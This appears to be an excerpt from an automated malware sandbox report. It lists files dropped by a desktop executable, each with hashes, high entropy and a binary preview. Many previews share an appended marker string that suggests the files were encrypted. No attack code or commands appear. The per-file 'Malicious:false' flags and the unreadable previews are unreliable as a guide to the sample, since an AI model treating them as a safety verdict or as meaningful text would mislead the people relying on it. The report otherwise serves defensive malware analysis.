              SSDEEP:24:j5YQHjA0lzdAFBfCRuVeIBTc96IP4N8DJaU8WQXCBFWhV/oPdd+bD:jWClJAFBa0xCj4N8JaXWeyYtoP38D
              MD5:205E3D91172CA72A2FD89FED4B58F0CE
              SHA1:D884773C2691D02161F5635594F85C1BCA727CC9
              SHA-256:685BEC3DD1B9AAC679CC956080F36553B09D821A8543ACC76F1E4DC39C1E38C9
              SHA-512:00D792719D9313A5DC21B968C6EDDAA9FCE9BD2B41009A186AC17D8309C74C2497CF80286770C74048A3DDA0B961D384E4A8F4B29177BE8B57FF26A70234208C
              Malicious:false
              Preview:<?xml..P.t..._...?..9..../.F.n.../..g.1.I.2..|..^0.R.4..L*.|...E....D....n.....zi.+2.X.M....c..O..8..Q.W0...:.|....#uH"....J\.u..!"..'....<$..0. .../bx.F&..T|...T...N..2g.....s.....G7.].T.m>.|......q`+;.X.K..._..r..3.6...R...v+...|G..g7e%{...>0.%P......c=.g.&....N~..B.r...`^..x_IQ`..B3...c.)...y.3k/V..8...N6....._Vk./Z.^.....Ydt.........!L.<..J..Y~...b.K..l...,:..~..G..^o..@....?T.(.f.D..r.sU.B....+.A/j......./..D.[.L.....a..=...i...jA.n..}...S.04.3.E"G..[..\..>..Z.8I..[R..SL....i...>0?...2iq...57V"p..r.+.i.rEH.D.E....,.P>%.7....*..kp.j.g5.3-.;Q............\..{.+..B.A....mt..B....)....F...".x..:..c..W:.?.t..:_]&.!....=f6JRn.Uk.....poN..A...!.Z..</.,lL.Z.*....Vu\.<N..ch.vSM......8.W."...V..~...r*....>...b.(% ..%..L|.f.F..Q.p...WL.7.o.6..~).~xw..x..7U .1].T......2.`....z....qo.....xf......X...?..'X.Xa..t.]..Pu..L.>1.......t. .a..K..h...?.].1.1J>.KA.F/I.K..;d?.,p.pq.g..........T'=.u..js...]d@v^`.D.j...........&.gigF2ELYocnMQz77LhEpSoXvtYp2jun
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1003
              Entropy (8bit):7.769510980789701
              Encrypted:false
              SSDEEP:24:pss5oq9HiclY7/PGryzHekkFJiJoTHAO0xCH0vKhBjd+bD:ps2oqxi+Y7/ermHHoTHAnxgOK58D
              MD5:E34BA57B8581ED67228AB25D5E6CD816
              SHA1:8EF37E6363F0CD585A1D528333FE8E77EDF4F746
              SHA-256:DDA06047CDDB520318316437659C66A8DC2038D887D9E3FF5D587CC2D35AC074
              SHA-512:FFEA469271B65066E4C5D9D664B15EC59B78BCBF772762D0C971A57277B930BA2E65F39507CC3FE4BAF6AAEF58690B96BC44F8031B29FB64A6448712B954B2BD
              Malicious:false
              Preview:<?xml..G$............3.})8......,.E.K.P.5.q?..i"......Mf..............v.qi..*.A.*-.&.].........0.=.}.z..... .. ~CG.O...eQ...}.';.#.V....3o..QR.....T|{C...0.......H....0..c.O_.,.4.g...#.n.M&..D.....p....$0....".......#|%..v..Y...2..xA.Haoi4..l{..zrM`|Eu.\],2......vs.D........"s.....w........4)..Es...m.......8.3&)..f.............P.:.`...d.,rjx.}.h@0[kp..^...7.....O....H./.Pe..qLp..O.......Rz.9..X4#..S%.f..l.2...5......kJ.z....h.......d..'..iC./ !YC0..<..}6......................M.\...59O6..6..)......C.de.....Vj...W.es.x...#...5T....x._.GH.."].....=..A..t..6.zN.L.)..-..1$#].4.\}$.....=..bp.$9.4RmH.Z..'..m...{K^uH..k..,...64.].......w..Z...].!%R.>..@....V.R....$...\....zG.....%JUK{..',......`...t.......]4...e.........-..E.0s.u....0.`u^8.]1............*......../.....Xx.....aV.O..}.=t.;kw..L..>......-......7x.....F....y..T.`...'...9r....Xp8.jB...."J.n.?:G...,.o.n.o.....B#gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2980
              Entropy (8bit):7.930229651150046
              Encrypted:false
              SSDEEP:48:xLp6Uy/Na3a4FReBC702mEl+kJKCEKaJdMJqck2nL8NXaM2kq7y/8+zZiDnzEJDd:xptyUaStA23M5+JzkotM2n7+zZonQJ+y
              MD5:50F91E709D0657EE291EDBDD8BA4F83A
              SHA1:913891D021A7116FAA5D13458202A4AFFD6FF463
              SHA-256:7476AB5116717BC7321C7D6253566EB5318EA85CF58B27A8126BBAD17849E427
              SHA-512:006754C028897BA245A80EC7FFA9B0397F4740EA20B4BD8FA11E71562BC74466A7D799A9B194CC9D56C182A7916729B15747AC9405B44A913A027CA95E080A96
              Malicious:false
              Preview:<?xml...z..{aU.By...{.=...A._....R..`..T.... .y<h:+H..a.)^.......Wj~0.tVG.hJ..o......)9!..=.ib....a.`....u...?...J.].......v..T....0.;{...[..mk.....B.z..-..4...?..R(f...(....hT....Td.:......W.l....8%..)...h..&...D..Tj.YS.$.....m:%....3{6n:...J.u.r...F...T3C......++.f....e-...i.....&.E...(.4....O.XLk.E;.%/...)'...b.?.8.....V......K..wc7.M...3...^>.....]........,.7L......hV70.3.Y:B.....c.z.....0.r..ei.A....c.....I=.fR.GB..g8...s0...,^d6......!..6...wg...`.!..=. S..<.n.[.7..].....D..;B`.....'!{D.0A.5@.z.eGU.H'G...y...EZX.(].Y..R[...6.N.V.k.Y;.`..m...'.*d..U.{;........y.....V...B..1...V.5.nK.4'..G......UkP.'..Y......u.!c.Hipd..OC ....u.z0Z.U..Y.......\..7...#..+.FD......+[..c...k...*.&o...;...6.#}.!]w.m...X.u..F.1.o....!>..=/.X&.jNV}Du..D...(8.7..alw......t.....v...E.D,.p,.%..Sc.G...{.?. .......7}~Vu..N..{..;..........u.B.o..y.....,.....Vq..v...e.[.......g.....g....J'_.l.E=3.]...~9...cs.r.Tr.(...W{X.|m..R'.{..+}..ik........h.u..l.(..d).'............
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2672
              Entropy (8bit):7.9165698115339005
              Encrypted:false
              SSDEEP:48:jt8Qx3fksrKdGa1UFtw+LnEgDXDpJTrzXOIbLpITgYA03CwEVYGKg8D:6Qxs6KdGa1UxVb7rzXbLpIrFCw+YG0
              MD5:1ED59DBD535B13243F75E7EABFD83F91
              SHA1:18B1F8144CE48184E7BC042DFC09B911494B7FAF
              SHA-256:89E22BB1FD84753F79A80E2378BDC8536E3B7A511FE0F36D27662D989FC95F86
              SHA-512:F4E425E0FC1BFB048E753F4699D7AF6BA514CFE7241177613A625212DD819687754DBEEA9714B2FE01780AA7DF0EAEA17361F7FC956EEF57FDB678B8C6D084FC
              Malicious:false
              Preview:<?xml.xR"...b.....X.M.R....q.......W.X)...^......ol..x.C.$..D.3?r.fq.S.c.....d...xv.i.A...2....5{s.....L.....y..N.a.=...Y.|.e..,...F.'..._.Q9.$:G........(.....a..Fk..N.....l...t............Y....&.....r.y.*.2p..@..QV...C..$.).......R..9..l......B]....&?.PA...uN.[yc^..n.HZ..b....B....6.P..z..!&......l...A..F......u8..8...z...W8js.L...B$..C++bH......,.......3.sU.8.I...ay.6e.'.p..%...Z....A.g.-.P...mtD...v..[.5..7...O.....".2_...'../UUN.&.5...L.....i..w....qamR:...5.6._.........a...LP4.c4N..]r7..m...DS.#=e.@..9.n..BD...,.I..p?H7...2.5..1.I!S.....N|....Sd.~Z..Cx.J...5d..1.'^Li*l....|IL..y..N6d.~..Rx.h^$...SYc...._.f.......1.mKc.Tb3.....M...$I...F.....`G...6]eJ..;<#.C...].^U..N.....`.....L.....G.._..DY.wk..Kg.....$L..<.%.....Y:...a....L...rg...E.*dZdQ...A3...J.......og.3c....p.O.j.r...%&.B.=l.......A\6%F.%.h..5..RS.l..z>...(V........5.I......t.n]..HL.&`?..O...cS1...:.Dq..v."..A.....R.a..op),.)=..........fBvn.!.EW.^!..5..6..#7.:.M\&.@ ....@
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2762
              Entropy (8bit):7.928323125706977
              Encrypted:false
              SSDEEP:48:Ds/OCgZTRIZoIdvcEwtAj6jbIUsMX3g919Jdu3d2a2IAV+u8D:DIhcA7dvcEZj6jkSg9dY3ga2IX
              MD5:8FE6351580D73547B6CCC86351BCDB93
              SHA1:154EBDAD29B2119374A15F817D1BB0AC799DBA6E
              SHA-256:2BC90C8DA18E6CD21ACD3E5C3489BFD36603BB181CD5EE7D04D8ECF819CF56C5
              SHA-512:72F9FF0E315D3A9CFEA6084CAD6D54F451F8CE779D0780EF75A567F9C011224FA2A6BCBBCC96F9174986BA53868CF7FDE1FD8842D05CBEE5420411DB28F3DDA0
              Malicious:false
              Preview:<?xml.g.d .R....L..Azj>......W!.*^*.9O....6a...e.3.D..9%kX5.C.k.............7.6.....m1.$....W..p..I....&.Z..($..=&~.#.0m|..[.+&......@.'.....(.).`.J...-._5.N%k......n.k#...e....&.8C.......1G.[P...c..-F#RJ..!'.G......;.i...4.7b..}.w.9.(. ...7.74<.............X.PF..8w.P...I%..v...z.o.....`p..c.8t..c.@m.w..-..)....hr...9......TVZ...Y.a9.7.2].3u...~..[.....@..n...\.9...@%.p!..5....y.l...@.A....8...SD.L.*.`..m..6s3q.vR..d..6..A.....=.._.b..a......n].>.._....Z.....7. ..1d.l...C.U.0.t.....8.b.b..4`7..$$s.x.,...).5..b.b.m.8..1...y...... .,M.9...J?.. ...N.@@.A...4...es....G.qI.&..>.=B..J.*.n..s.@.....R..=....R.!...;.QZ.g_..!>.r..........1.?.e.}t..@}3.z]T.. T....D..U......8...K\z.{..s....Z6..!....r....{....U4S.....3.d..X.V.&.7..%.. .t..y].?...I.......>....;s..c...Q...A*...d.i:F..r;).I..f...G.l..K#.?D....z8_du....lD...$..t.X#.Gh.......)X..Sv.R@.....<.H.........,..'rR.,..H.....9h..]^...V].ZGRe....Jl1p..6....e...B..p..R..*q.H...1.{..R..V...zw..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):838
              Entropy (8bit):7.756118711066668
              Encrypted:false
              SSDEEP:24:YvReUUMBd5QcuOTDW8IGDKOzxvxbxsR/ZGjd+bD:hUUMrhXegzwhQ8D
              MD5:AACE6CFF3347E4C2FDD2D770FFB6D63B
              SHA1:D6E87D4D9E44A7B899DDA2A7F30FF3F7C3F73D36
              SHA-256:5389160AEA758AA25F99DC69C4AA27A2C6A3C770375EDBDB810F9EF12FE6B9F0
              SHA-512:A4043AB9793ADAE4740B7BC5B0CA87CF0CB4E370BAF4BDD356D4FB19C2308D4BEC4DEFE16858E3FDE3156A3D432C9B85E7BC827143625173FAFF0C10EB349549
              Malicious:false
              Preview:<?xml......:4........}Q...%.^.....X.i....6C.....j.P"e.<Fn/o.-|......-1....S._....b_rE.u.c..\.|...Q........P.0..{.....,}..O..qP.=.@...=...0.K...(.....:j.._>.......3._.?....nq......\.k....o....q.7_.Ncx..4.......S&..9\.......Ss...m._.....p5...$m.{.~;2u..R=.{vI?a...g.....^.:Y....V..;.....?J..Y.A.YK...Z....O....R}./.AZ.'..{...f/.v`..:..5W..cs...z...s..1r.bC....#...]..D.B..z@[i..P......!..T..va....8ws.,<.D~..Z.....C.6....B...r..p3.[._#........Cb.Ktfs.....K...d..:.(X....f.N...n...)lR...t...5x...n.Qs....S...T/=#.7:^z......."...dv......G...%.'.ZX........}......E...b..l...\.a.).....8#^T....,..5...F6...s...&.W~.2z~.!..h@dJ..lb..lC........p.........@{.;[..;5.K....._..#=..T8}.......D.)..J2..R......X.....`h..I..X...K.....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1010
              Entropy (8bit):7.7902002077401935
              Encrypted:false
              SSDEEP:24:C8fbyuu3BcrY5rngHU1GBerCdTw0AtRR/Vwd+bD:CTBeY5rB1ceyU02RR88D
              MD5:DE90057F0901FE2BAE628C73B5DB0A8A
              SHA1:F568FBBFCA7D2DF49B3080DD9F5EE4DBC18A08EF
              SHA-256:85EE650360AF37B3D35C1B65FA767B6BB0FF0EB5B45CD2D1C9E179D8BF722654
              SHA-512:187673408AF3B61DBE319CCA57D938897BA3BBAE7B9D4804B2ECE891E3BB3DF52931377CEA80E0A498AB5E323957A002401C9B61B5932A7BFB5CDCC405DFA61D
              Malicious:false
              Preview:<?xml..dN...]...u.......-..@.........%.e......&*.....w..tOkc(.}.:.`9..5w.K.A..iyw...j1.........j..DfQ.(6,M8...=.\O.S...t`..ZY........hl..|q...0&....~J.d..:...I6...i..._./...i.z..J....`+k.....:_.O...;Q....J._k......7....l.rw...ko..^...)..........'m.6d..>........O..E.>.....8....xN8...........-.Q... 5C7C....\.....CBT..mt.M..U.oF..#....k.:.......Rv..1..]i.B.....,{...FR.;.].?.&.b.....+.u;>...r..m........L..1C.h......W.7.2c.2 .dRj..h._ -.....8.......z`..?0m.....`.......zE......8}^....X.,E...B...D}.z..D..'.o..9C$>........[....:(Q.:d'u.$...o-..Vi.4...?...%.....f..*6-.J.e.......eM.f.../....`.J...yG.C.N.a...Bu....-5>...?..m,..L.Ja..jf.3.Z......;..4...%..........".[^}.+Q!.........hm.....?..s..Q.....Yw..B.3..4....gkdn.5.h.\..U...U..c../.MbH......O............y..>}.)....o.....nyN..F..vHD.`....Ty..E7!U.aP1...Rj.L~.RT..N.F...`..o..g.?.7.ln\....h.E.f;(R..@.eYl..5...C.r...?..ZkgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1380
              Entropy (8bit):7.8730985139788725
              Encrypted:false
              SSDEEP:24:X1LBxummrtW3pkmjRK27lga3HKjlj278XeKX+oK6AiAMpbFB8Pd+bD:XlpmQ3pkmY27lxXKjFk8inQFB8F8D
              MD5:6BDC80F84C10357265C459A1537EF682
              SHA1:CEF9011974368EB5811F374E46CE1E233BC79050
              SHA-256:56466CB1AEAA9B86651D5A129FBDB74061951E2BCBAE862BE442B4AAA28548DF
              SHA-512:F7F849E4F5E91598C5AA90F01F940F2363937EB0247A776D612844434D20E2BA34E4C0540F9140E22B7559AFAA3059A3EF9472FEEA98F02F56A9D53340260462
              Malicious:false
              Preview:<?xml.........,.D9)?Z"..P.(Sp..#..s....NT..d.+...g.....B...f.z_I.>........V.DD....c.5..Nsq.9.....@./........m;.G\..;;....d^...a-\8e..8.....8...+P'..lS&j.2tz.gwb+.<:.G...'..=Ka....{...c..R.*"......{CO.?..q....R.5.l...6..[F.Z..h....UL.q..g.....w..Ru.$.O.'c..p=;./R.NI}...}.e.j..!.s.......P..O.r........_M....h.]<...4=*...5'.j...HG.H.l..NJ..g..t...0V....vY...(.....LQ....^.............<.C:Wm.Q.t..@.;&..K.b.h..{.:..x..G....r...O...}..{*[$...............K&f..91u.D.4].\p.X.me.w.Eb..1T.\...".].b8-..JI....e.D.U.ta...wq..."..~B.A%.E.Q....Au2...........1...w.nn...+.s.a+...}..F.g}.wi.......Y....:]..7....Py..M..zL3..:O0...l.NY..X.'L..&T...9-.dP.N3...1`:.......^.0q[8d....B."o/..K#.LX.L^m..4...K..K)......fB.N...l^%.U.*.......h.${.6#Sh.f73=....1o..u<+.O.Yo.>?[o`..!.......O............TH.....`D.....`nT.b....1X....I..+:.......V.......o...c.E.Z.Rn.I..P..,.t....X?D..<..^...)..2........fp.W.V.-+#_.7...G..1^.....w.A!.Y.dn.fho.....@.,%....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1614
              Entropy (8bit):7.873088329087374
              Encrypted:false
              SSDEEP:24:0HvZ8iwt+YShjyPid1wRBO2ubM55HC/eeWPdXZHLTHty6X3G7QG59DgVdHDOd+bD:3EY0QftubgWtKdXZHFy6mUqUrDA8D
              MD5:DEE3EF8B6D22248916755F2B7F13FD80
              SHA1:2B28BEBA39CA5B86F97EA1D0B4FFEFC74CB79059
              SHA-256:6A47EADA067D00728B2CEEB49BFC3F5811F65C3BD8E6BE47185D8F1F093540D7
              SHA-512:4E1B27E7BC912FB2E6D8CD0A4B715927389EF2C94F56AB112680C6C6F5A73BCB0E612AEB508652D0ECB1169D885BE990A87918C03F0E663F322A704D58C6FD14
              Malicious:false
              Preview:<?xml*.Y7.....n....\..LW.].nY_...c.w........y......&.V.\......0.;"6=6.Y..Y.=al.. k.......+.b....|......(.$,...\...w...Ki.................2+.R.2.n9.4{.Urs...3)}G.\lNs...n.t....A.lH.@...c4.8.z..Q-..Q..N....9 fc......sd...g../....../..8^ .6...d..P.....Z.X.S...'n.Ip......#...".@...P...|8.Y9...x.......... ..@YPm........Zv.<bf..zM....lg.c.e..VO.t.OL.KA..4M"u.>6.........@...}....u.I..(j.7..d......r.*.lC.........mX5...9.m...aJ.Zz.1..p..IS......#..le....8.&.5.|....V....W...L....\]...Ow..5.1..mo.....xC..I.y..m0.v^2....2..:Y....!g.Y..|?..S5..P.A.?w..)..$... |..R.......y.....]..`....a>..C^}.u..:c...U_n..Y.,...;..).A*.]...!...0....a........$.AL....H.4..vLvJ..5W.j..Q]Y..6.*.U........|..BUg....[.........F.....Y..Eb.C..+..tHz.a..C.......lE.?..a4.4...k../..D.67x...`.p...|.|.k..nA..{.}.NN..E....u.g....$0..V'..."...u...9./...R...~.h.7...e$..zZ?6q....R...w.~.Td......=..a]r|.......@......a.N.;...U.J.2<...S,.Kxt.(..XX..@.{.X..X.8......T....#e.]d.1...!...jV.e.&
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2753
              Entropy (8bit):7.938134136204126
              Encrypted:false
              SSDEEP:48:fFJaEQzMLdldHcOWohNgGpT48UXQDDKSfTVIgzgA8D:ytML/dHcSEGpT70SLf2Cgt
              MD5:074814DC103ABBC9F3D9BFC272D3721A
              SHA1:DEB37AFD3CE3AD8C6BB31D728CCAD925EB1E8EDB
              SHA-256:158BC500A780BCB7F1B7BAB5B007D00E6435F6CCF1B01417640603B6DFBA541D
              SHA-512:CD4244654E90857155355C35BFB754618EDB28722FB672FDB79DB8301723A441E19838AD771A725F088A262B67D638AA1F884D33116F2731423A630BBB17CAA5
              Malicious:false
              Preview:<?xmlKD...LV...O.C.@.N.ak.D...^...g.N..<]Pa....R....^C.g...b........W.INv.... ..3[.&N..r.M..$..&.?j.y.|U.c.#.K(.........f.i.l.r...|..G...x.fq....}S.//.....I.HXp..iQ.).t..._.qO.@j9&x<..~Rr5..WW..Q..I...W.G....F~......{u\@...+O......1...!.T..c.^...'.`&...out........Ae...."..AJ$!jm6pG...o-#+.]..6K.'.b=.P....a..V@..?.1....@....{....0.*.......:0.{...c..l....*....Z*7;%..c..). ...........t/.Z.*G..U9.V5.....,`..T.N.V5.2.<.....k.D...ZF8.@O.e..X.5..ivj.K.,.+..).I...W..{.I.e..Z._...x.K..(....Y[.=......u..M.^.."'........M..V.VU.b...L..@..y$.=P.t.-d2...)ff.x..`..Dao....V...N?.u..X.F./..1..2...%4...nL.h.....6.?J"o.4.<<:........LlO.X5i...*...b...sE...:qC!.6.j....n.......+3\0....6.O..Q......{W.vO..*...N=..^.."..J........Z;(..}...F..X....3r>2.*.1....'......0.{..G.5....r.dh|H+...S.w.C.,.....].O.c....5....J....l.r,...L"...=..k.P.....wO..b......miJ....^.oAzw...#.<*...'....h.>g|E.l~.Uk....GT.....x.%}....d....h.-..lb..8....m+..gw>..Z.r.Q..gQ...S
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1558
              Entropy (8bit):7.8772400072312205
              Encrypted:false
              SSDEEP:48:pXmHvhqNNelBc33Av/BE3KyhE7K0b0MRlKHPZJ148D:p2HpHc3wv/y3KMoKE34HPZJ
              MD5:8D1FB86661900EE1EAF7D0B3E5F473C6
              SHA1:9772527C25409F7D34A99EC361D197D35B72D82C
              SHA-256:E5447BA16B1F2259934A82FDA2663255DFEB832113578977821AFB8F1CBE6714
              SHA-512:755048FF483AF54703B90AF138DC0718895572E990E21017E6B32E61AD950468428F6D0B062498D2FD4E8DE5FBAAD5FBF2D1D4488D94D4D328C29AEDCDAEBE23
              Malicious:false
              Preview:<?xml...V.@.g..U........8.....Qyn.D.N=.n...;.#..f.;....tU..%....t.....R.X.G...M.!p5..9...B...@.~._..f[D+.yY1.".oV..!...........1}....l.g..s.r.....n..5....t.g3...F.o..zg...'J...@..z...P.\..=....LQ.......i..r.).{B F..C........K.,'p..K.*..\......3....C.s.......A....(...3T.(E.}..k/...S3Ru..B?..n.g...7Q..@....-V..8..G.C.7...n..0..#s...12}...4[IZ....*L.P0Ec.k...j...=oTB$.O.xI...xe$.7=|bd.l.,,..:..4~...4K..'gj...q...^..3.........7I....{....M.4.&.h.#...b.A.....Kc..f..>.....R.i.vP...... }t.R...R.....1.....}.)I....A.S.... ~.....c.."..:..d.93#.0>Y.;...(..S..3a\xR....X/+...7/....._x.c.....3j...q.g+........?....A.`.....;S..i.r.J.....:P.SKX...o.]V..? ....N9#.~~..VH ..b..bg. .....W...uM.A#..._$6.{+..hw.iL...D....fv.D.4.P...Y.{.{.z.....-.9F.c..V..6...1K...`)..R .]..Q...4..`..^.SB.:.C=Lvs...E..v.../]..}.f'.......&....j.w....dn....b/."V...Yq-....C.....x...........m.@jD.......OQ..(..V.D.-ic.yp.;........!b..]1.....d7OC..jQ.S|.V..1....P]...........?
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2251
              Entropy (8bit):7.9156251360067875
              Encrypted:false
              SSDEEP:48:hC+gBbYxELb+CkOq64lNQGXXkUvAlXVADw/lyZSK8KYfu8D:MBbYxY8Oq/qGkqAlXiDeyZSLKk
              MD5:3101463276048046A2895AD5734E0C1B
              SHA1:2BC4897C485A5469BD529ED185213654D1D4AD85
              SHA-256:555FF860426C7AA89DF6FC568A515AC3620F322DBD041DC88125795C0636FC84
              SHA-512:D76A63C711AD5F6A465B2DDA29202FC4A8A31C618556C24F6202CB92CE83780016365E6A6A9C293610D65F2A406F6C3CED44CBAD6AA138D181BD5B95B5A513C6
              Malicious:false
              Preview:<?xml........../.5..x.)`.. O>r>_>.*..M.l5......l..g.-....v.LB..V.....>cX...M..~Fj....51.....\....f.m.!....zL):D-/(.r0..1..].s.x.....y..{....U...Z..zAx*..N.@.6t......he..H.0W..).4'....Z.SC.f....s..7@.u.f=.|.. ...+.$..9o.N...5B.[~........`.......9.S...5.....9..N(.7.m...<.ue...o.a..'....vr.>.O..~t.rq}............[.nz>%.=..u.U.....p...M..!8.Mg.k..@....,+....2!...1.Z.;.....>.y|..<8.....]../.+....W u........9'.7...|..U.....>.;.9b.w.'_P...z...]_Pj.Q..*,..#|.X`.......J0s..J.l].^II!.....y.m...L..$Aj.U...[...:lW.abk..H....~@i...vH.^.6E.>..v.>.7.#.^r..;....FN`...F......9..f;JS.;.'I?*V4.V.....{.B.y....i...<.Z.A..Y..,|.wA..w....4r.vT.X...........+.9......h.j.i....Z.|.S!.$./..[....a..H.8dJ_.o1-.3+[.9........j)z....;.U......A.....;*j.?K.3.(.....D.6"..-p..t.tkc..|.ew..L(.NpN....\.8...+..fL.G...M$..1..p.U.Y..o......../T........a..#...........\..~."s..s.%.S.[q.E.y.'N.........J.H;.W.\<..`...URT2F...Tw....S..>!.L...b...h...q.!..(^.G.3..;..d8....a
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1826
              Entropy (8bit):7.906818653750952
              Encrypted:false
              SSDEEP:48:JgyhxbOZy+YtGIHi3nnT6VqqHR2F+JZBVPquFnVNbc58/58D:JBhIQGFj6cqHRtBkuRLbc5qG
              MD5:15856269365EB2D1FF5CE276C6BFED3A
              SHA1:09655CBBED25EB7681107EBDD6383CD56D2CC9AD
              SHA-256:27B5864483DE777067BF287EC06516D2674326A3B6AEA38DF73783CA29080E6B
              SHA-512:2E0A589AAD7C876453B15C1C2EB170B2AF6822E69040563EE3E96BD223430FE6130446D9B4FDE4474803124D09878A02F741AA6E3F36131D9EFBDFD72A5C7778
              Malicious:false
              Preview:<?xml.> .0......>_..,P.L..n..W.... .y. .$...\..._..%.=.X..............X.....u.k.8p..X..\..Q5..E....$V..9u...`.r9..z.D0..f....V.X.R.k...GW..l......\"dI.B.......w..P ..8o}.b..p./......u.....7AO..b.[...GZ../......_.vlC.h...B.M.?R.w.b.y...b<....I.......(k.^.4....Q`x..d@t.m.UJ..2.....&":5....o{..w.c-..4.......0r.Q..M..wn........$.!.._]so;.....B........e.H....&.....4.H...]y... ...o.K.)...._9.........`.....g...\2?0..u..=....h..T.n?[.Q..%#..!.^..c8....^.B.1...?l......3.......o.c+...|.Vn...>..9..N+...|......1D.....\FaI.T.C..S.s..*0.)."......K.3......;...r.fE_...!u.O..../.)...h.......a.q../F.[(..L+..G.r...U...b.O...:....]&Y.....2L.(..v..r...'...y...Y..e.(...K..._.....1.*.?.Mj<.~1..f.5....*..[W.56x;.F....M{@@..[..X...V.....<.S......uM...g.M...*..e.........$..b.u.......M..L.&...4ag.....b@..1..-.i[i....j..#>.3.. W`...F.L..%8......uW.[..1s.-M.L.V..j....ixBs:^2.B..5"Z..TZ..._..R.4.._]...M..I\..@..!.c....Q. ...p......|...:...ARC.o.R)s..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1197
              Entropy (8bit):7.8299178571398
              Encrypted:false
              SSDEEP:24:32iRVS9WePrvz2k/d5sT4JBcrkoJEXq48Q0J4yv2ZFWq3Vf63kd+bD:32iKRrKkoT4CbSa4OJ4yY1M3a8D
              MD5:DDDCEF868805AE8EF9E3E5FB296C05A4
              SHA1:5914B9809D96AA28C2AF08B5576EBF7718C7A709
              SHA-256:C722C4FF2A7E20732A7867F65E3BF62BD0C4E2CB9D536AA4A0271E42F524C016
              SHA-512:1B8FF10A27DBEC5877695F5816FDA2B8FA86A75542EB9839D2EA5F58B5B52C72E4B55585B7A5A606287C3F8470E451E9779D52EEC18334267133A1288A1F6D20
              Malicious:false
              Preview:<?xml.z....R..Uu..x.e=..[.U~B.*.#.'L...j.`.y.uv}...!.f>..d..*%..r..+..e...-..-..nLN..=N_."...h.......m\..[....*.......N.}..{.q`I....Na.._.w.....`4.u.Z.<.....N./..\..k_..*..o*/q...J{.b.........n_l..c.X'.#...1Z.)K.j.Z...oN...X..6..].H..P.....T.&L.8t. ...l..L....'...d............A...%....6W....C.g(.m.zb.k&U.QBd{.w.-[..x..0F;$..l..j?.._.IOP._D.N<I?..:p..Rz.V._..4eX;..F/.dY...!...q... /...<..&.&........?c..=.d....|.F.u....e.e.[."~ .....H.:.i.. .@.8"..W.iG..1..{.Zmv......e.Z..P...[.[>7f.:?.......v".G..F.7.......T.&...3n.' Q._[avq.~Bz8....^... .U...c.>...fj.-.@.....6.c4...Q...9.P......T.......J.y....?/..^1.n..1..p4:..m{......>. .>.1...~L.x..i....?.E..r...k!p.M..........L...]..V...P..~..7c..K......G.=8.W...I...Er.8.....E-.Y!.....+%.....Q<.0T....!=.4.VVh.g.4..."....~....W.0T..D.c.=......U..M..z....ne...9M..p.........k(..F....'.V..5..m35VU09Q.r~)r.Z....Q....^.I}..vH..G.[.B...F~.G.>5..-a.....l ..;........Q...w.`'P.."../I.Q8!.M...n...P.n...x...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1004
              Entropy (8bit):7.766519560181079
              Encrypted:false
              SSDEEP:24:6TIBHe84V1Y9J2VbQdW5OYgYE7Q2MF0AkfxXQpcPHd+bD:6mHe9VuT2+YpDsJXB8D
              MD5:AF70AFE5CB719008CB1C3ADAB7E6B10D
              SHA1:F5238042A43BD3F486ADBBFE9991ACB00AB13806
              SHA-256:02B7EED1D38626F5A5DB8A85B659C0341E1AC69E57F119160E5C969C2624A188
              SHA-512:C89C66C8386F1E4D28FD95D32B1D987525327BCFAAF9B6CDB4106840F58CE783276831F561586E92205A582365E88DE0019A98E06FDC84F2B50CC1CA4BCF2CEB
              Malicious:false
              Preview:<?xml.U.."...s..'.....xb.i.S..G..K..j._2.'.%Y...t&.7%.wx."4MEEa~.'x..yY....h./A~<..:...s....G.......^._...Y..h2]l..v...v..Gi.w(..._...k.t...../.....k.nv>>YL...1...;?S`p....c.:~.8..t..7..>.R ....'...Y......$..M.....=...h.0I3..t.,[.'.....l...<hH.=.....A..@~T`..quc...'.......P.O<....Y..s.......[65...DX.f..XE....f^..An.".Te_t8....e...0c....W.@.....Qn.?'cc^.X...x."<E..Y..z...).'..X..)..8=A.6a...F.X.f......,..OJX){l...H...9+..J~}x....J...f.ky..V...Q%..*.....>...W"..r#....R..8..I.R.uL/f.j*.~o..XN.%.h.#\k.k.$jHU..Ex/..d.2.v.q..:.z.vX?.Z....W"X..Z..G.?1;-Vm..b,...M0...7#/....m...Fb.o..y.:{^......Z..l.2y'c.E...5.zU...t..|......p..C3...~..n...P.......}U.%=...9......KqN7.&f@.F.:..I.. 